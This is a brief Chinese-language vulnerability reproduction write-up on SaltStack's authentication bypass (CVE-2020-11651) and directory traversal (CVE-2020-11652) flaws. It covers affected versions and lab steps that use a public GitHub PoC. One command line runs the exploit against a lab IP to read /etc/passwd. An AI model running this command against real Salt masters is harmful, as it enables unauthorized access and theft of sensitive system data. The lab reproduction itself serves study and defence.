介绍:
Saltstack是基于python开发的一套C/S架构自动化运维工具,通过Saltstack运维人员可以实现在众多服务器上批量执行命令,提高运维效率,因而受到一些云主机商、私有云公司的青睐。然而,近日SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。其中,通过认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master的验证逻辑,调用相关未授权函数功能,达到远程命令执行目的;通过目录遍历漏洞,攻击者可读取服务器上任意文件,获取系统敏感信息信息。
漏洞影响
SaltStack < 2019.2.4
SaltStack < 3000.2
漏洞复现
kali攻击机安装Salt3000.1
https://pypi.org/simple/salt/
tar -xvzf 解压
python3 setup.py install安装
下载poc
https://github.com/jasperla/CVE-2020-11651-poc
查看读取文件
python3 exploit.py -m 192.168.31.221 -r /etc/passwd
